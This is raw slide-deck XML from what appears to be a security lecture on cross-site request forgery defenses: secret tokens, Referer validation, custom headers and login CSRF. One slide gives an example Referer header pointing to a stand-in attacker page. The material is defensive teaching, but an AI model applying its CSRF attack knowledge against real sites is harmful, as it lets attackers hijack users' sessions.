          <p:cNvPr id="86020" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5318125" y="614521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40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128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114800" y="2438400"/>
            <a:ext cx="4133850" cy="457200"/>
            <a:chOff x="2832" y="1008"/>
            <a:chExt cx="2604" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86032" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1008"/>
              <a:ext cx="2544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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86033" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1035"/>
              <a:ext cx="260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FFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>&lt;input type=hidden value=23a3af01b&gt;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114800" y="4038600"/>
            <a:ext cx="4953000" cy="457200"/>
            <a:chOff x="2832" y="2050"/>
            <a:chExt cx="2986" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86030" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="2050"/>
              <a:ext cx="2880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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86031" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="2078"/>
              <a:ext cx="29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Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>Referer: http://www.facebook.com/home.php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114800" y="5867400"/>
            <a:ext cx="3568700" cy="457200"/>
            <a:chOff x="2832" y="3051"/>
            <a:chExt cx="2248" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86028" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3051"/>
              <a:ext cx="2208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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86029" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3078"/>
              <a:ext cx="224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Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>X-Requested-By: XMLHttpRequest</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86024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943350"/>
            <a:ext cx="1524000" cy="72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6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5613400"/>
            <a:ext cx="10287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7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2700" y="2247900"/>
            <a:ext cx="8001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961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Secret Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Content Placeholder 4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Requests include a hard-to-guess secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Unguessability substitutes for unforgeability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Variations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session-independent token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session-dependent token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>HMAC of session identifier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87044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50323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65138"/>
            <a:ext cx="8001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499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Secret Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88067" name="Content Placeholder 4" descr="Picture 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9982" r="-9982"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1495425"/>
            <a:ext cx="8458200" cy="50577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872163"/>
            <a:ext cx="8253413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42999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4419600" y="5991225"/>
            <a:ext cx="4078288" cy="4794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221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1066800" y="1828800"/>
          <a:ext cx="7286625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6" name="Image" r:id="rId3" imgW="8076190" imgH="3631746" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId3" imgW="8076190" imgH="3631746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828800"/>
                        <a:ext cx="7286625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Referer Validation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318125" y="614521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40458C"/>
              </a:solidFill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270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895600" y="1976438"/>
            <a:ext cx="3276600" cy="3910012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895600" y="3981450"/>
            <a:ext cx="533400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF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5638800" y="1981200"/>
            <a:ext cx="533400" cy="2000250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300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14341" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1905000"/>
            <a:ext cx="170338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Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1600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Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="4286250"/>
            <a:ext cx="22764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Web Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sets up malicious site visited by victim; no control of network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14344" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="6267450"/>
            <a:ext cx="71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Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14345" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="4343400"/>
            <a:ext cx="6858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99FF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46" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="5257800"/>
            <a:ext cx="6858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99FF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47" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="2362200"/>
            <a:ext cx="6858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3300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48" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6324600" y="3276600"/>
            <a:ext cx="6858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3300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14349" name="Picture 11" descr="CompaqAlphaServerES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228850"/>
            <a:ext cx="11557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TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3184525" y="2619375"/>
            <a:ext cx="1001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System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Cloud Callout 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="3981450"/>
            <a:ext cx="1155700" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -186846"/>
              <a:gd name="adj2" fmla="val 43949"/>
            </a:avLst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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14352" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="30" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4919662" y="3748088"/>
            <a:ext cx="492125" cy="12065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53" name="Straight Connector 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4256088" y="4743450"/>
            <a:ext cx="457200" cy="17145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14354" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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4252913"/>
            <a:ext cx="143668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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="914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Web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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Validation Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Content Placeholder 4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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: http://www.facebook.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: http://www.attacker.com/evil.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lenient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Doesn't work if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is missing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Strict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>validaton</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is sometimes absent…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="1752600"/>
            <a:ext cx="554037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ECD882"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5500">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5500">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89093" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="2179637"/>
            <a:ext cx="482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500">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89094" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7793037" y="2705100"/>
            <a:ext cx="4397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4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
              <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128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5491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Referer Privacy Problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="901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Referer may leak privacy-sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://intranet.corp.apple.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		projects/iphone/competitors.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Common sources of blocking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Network stripping by the organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Network stripping by local machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Stripped by browser for HTTPS -&gt; HTTP transitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>User preference in browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Buggy user agents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Site cannot afford to block these users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97273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Suppression over HTTPS is low</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6146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779462" y="1717675"/>
          <a:ext cx="7526338" cy="369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0" name="Acrobat Document" r:id="rId3" imgW="7284240" imgH="3691080" progId="AcroExch.Document.7">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId3" imgW="7284240" imgH="3691080" progId="AcroExch.Document.7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2" y="1717675"/>
                        <a:ext cx="7526338" cy="369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Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1989137" y="4029075"/>
            <a:ext cx="533400" cy="1112837"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="869406"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91436" tIns="45716" rIns="91436" bIns="45716" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" baseline="-25000">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34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161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itchFamily="-65" charset="-127"/>
              </a:rPr>
              <a:t>Custom Header Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="942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XMLHttpRequest is for same-origin requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Can use setRequestHeader within origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Limitations on data export format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>No setRequestHeader equivalent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>XHR2 has a whitelist for cross-site requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Issue POST requests via AJAX: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smtClean="0"/>
              <a:t>Doesn't work across domains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438400" y="5486400"/>
            <a:ext cx="4572000" cy="457200"/>
            <a:chOff x="2832" y="3051"/>
            <a:chExt cx="2216" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94213" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3051"/>
              <a:ext cx="2208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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94214" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3052"/>
              <a:ext cx="22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Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>X-Requested-By: XMLHttpRequest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826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Broader view of CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259" name="Content Placeholder 4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Abuse of cross-site data export feature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>From user’s browser to honest server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Disrupts integrity of user’s session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Why mount a CSRF attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Network connectivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Read browser state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Write browser state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Not just “session riding”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12399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Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172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457200" y="1471613"/>
          <a:ext cx="7924800" cy="511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4" name="Acrobat Document" r:id="rId3" imgW="6998400" imgH="4521600" progId="AcroExch.Document.7">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId3" imgW="6998400" imgH="45216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71613"/>
                        <a:ext cx="7924800" cy="511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4191000" y="5334000"/>
            <a:ext cx="2667000" cy="838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4381500" y="4152900"/>
            <a:ext cx="2057400" cy="304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16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Payments Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9728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038" y="1209675"/>
